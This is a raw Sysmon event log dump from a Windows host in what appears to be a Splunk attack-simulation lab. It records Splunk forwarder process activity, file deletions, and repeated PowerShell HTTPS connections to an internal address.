Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.130{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7477-613B-68B4-03000000C801}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:31.116{B81B27B7-7477-613B-68B4-03000000C801}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035343792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.376{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7478-613B-6AB4-03000000C801}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.376{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.376{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.376{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.376{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.376{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7478-613B-6AB4-03000000C801}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.376{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7478-613B-6AB4-03000000C801}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.361{B81B27B7-7478-613B-6AB4-03000000C801}4464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.329{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F872D72ACE4CF8DCA7BB53E5568D87E,SHA256=E85930A9256D93842DE414E80C0A9658ED12CCB638B20D438A556D4CAB6DDD27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.129{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E4E089FF3E18A3C633B3169AEAD58F0,SHA256=F5D0E65545093C98718A70E71D27B1C1DB9AB11460DD62F71550649069F9FF8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:32.129{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=187A746BA10C77CCE25303C596B0DC85,SHA256=CB649CBDEB47B5A0A4E52B2ACE4D0C3129BA418C0814E4D94F9A809F3D2BF934,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:59.235{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52594-false10.0.1.12-8000- 23542300x800000000000000035343794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:33.428{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E4E089FF3E18A3C633B3169AEAD58F0,SHA256=F5D0E65545093C98718A70E71D27B1C1DB9AB11460DD62F71550649069F9FF8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:33.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F15CBC3D09BDC9436A700207D3D884E,SHA256=1A2465959077E4F407D5A82C865804C34F4956638A41E53FC85683427A112875,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343798Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:00.450{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52595-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343797Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:34.493{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B1E333919BEFA21DAD974DFD57832304,SHA256=74A1EE2406667BE72797EDE5504CE8491B27E6892138641622B7F477C7E35424,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:34.358{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25E99490AE4E08B0CF2A999793A53B03,SHA256=D05F01FA24DEE3877472EB8A82EA5502869B465BCF07ECDCFAB4339EC7A3FFD5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343799Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:35.392{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=292E8E5615E75716619AF27980BB3A8F,SHA256=9A242BEF3B69ABAD211BF7BD5B4411117DA09446E1A2F6B9E06AF6A642E2C0E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:36.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=317DC7C1E6F53BB40319F7B3A92930EE,SHA256=E35C25B3A9BE0470901499928AD2C76F198B0DBB107A4EFD3102C83EBF168408,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:37.424{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=188A76A6FD3A74BEFCC7635FE076502C,SHA256=8E2878CFD80F39F9D3F8541502C8DE7A3990A52768B8FBCB9107A3FE0BA62B69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343805Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.462{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52597-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035343804Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:04.246{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52596-false10.0.1.12-8000- 23542300x800000000000000035343803Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:38.489{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E8CE10099730EF3A27F5E36AD90C6645,SHA256=72562AB95E7A7ABE0B022193587D1ADAB63A94D9986A1408BDB694A1DC5738E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343802Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:38.424{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=901A5CC80C3B03B47A6EE81F08D62F63,SHA256=8B3D7817F629F48E9406C23823121FF27A2FC85C7460B75E7C719F895F5622BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343806Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:39.454{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17DFEA19C43B5B80AAE87497EC0E9B0C,SHA256=2AA6FB0E503E295AC90CDD34093BD09913193F6B00A7109CE7ECC3DB04F57B5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:40.472{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AA9AF676BA031426BCC52ED17AB87AA,SHA256=A6ECD0A16721B54D4EB7D137B0B3059DDACF8FC5BF35C980AD279526C5C562AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343808Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:41.489{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3D156F7B0E765D23C256DD7AE0040CB,SHA256=C600919CB9E343D52B51119480747E6609ACA576C35C9CDF6B148E8F4EACC492,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:08.463{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52598-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:42.689{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=52FDF5012A3CDAA8455310B80B7F91E7,SHA256=7C4CA1E454C81F405193CC32B9ABE22576EBC16CA523AF1A8128488939F64841,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:42.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA40BF796D87CBD93827C39CE934056,SHA256=C848B8EBDC9A2BD665605194012A586B72C3F5881450DCE24F828AEBE0D6D948,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:43.508{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00B3A9DA4BBAD1A3EA3A1B1890281343,SHA256=8B44A6DFE4D654D5C7A9702D8CE3B560986003A42013CCE59936658B15926890,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:44.908{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2B4B2AA3D1D3F248683E001ACA68EC84,SHA256=96D60596ADE4647299E5ED88ADE11B90D680D8A25ABD9681CD8D35C36F3E5917,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:44.508{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33FE004726C4CD573537A15E5D2FFAB,SHA256=CD960933A837D7D155EFB6D936DD2C644BADD48390088B6C892332F5BD06325D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:45.524{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AE112AAF4CBCF67C18875E721B90E37,SHA256=D186783404579582A4CBC0E8234A5136B8D27464DB1B02789BA4ED55E3C05547,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:07:09.246{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52599-false10.0.1.12-8000- 23542300x800000000000000035343817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:46.554{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EA88F6D6412E1A7991893FC76E53596,SHA256=6D7FEBF15C6C9CEAE034CC9E70396EEDE80264D636075402B7D21BC4D9BCD1DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:47.569{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=030EF6E01000670A8C5DF0E36574DA4F,SHA256=783D154E95E80FFD29D064750F09BE28D6FC6DE349D5E5B01C18559E17AD1CEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:48.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB7A7278AE5A998A86C5B1EB54904F4,SHA256=EA8BBFFC2D0DE70CC2150ED10C1C13E78C8CD28F2469F7C32E84CB92063488E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:48.521{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=91D974416C53B24266F6549017A12BCA,SHA256=743655F74808C71D92BB01CFB5A2C1E1E4110B044482C5F94E4E6F17EE9B478B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:49.619{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEE326E9B3862FF33C7D68AFB9F34EFB,SHA256=5A23DE01747467AD496523620EEF0B17F3302E608E719ADDD3FFCA56BBE3B8EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:06:50.650{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23D45A9D3B4F6D1400ADA2D4C944CB02,SHA256=4BF6A1D3C893C87DD2281360B7D6FAA5AC5D421E6D8ED7D665AA0F1ADC6D40F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 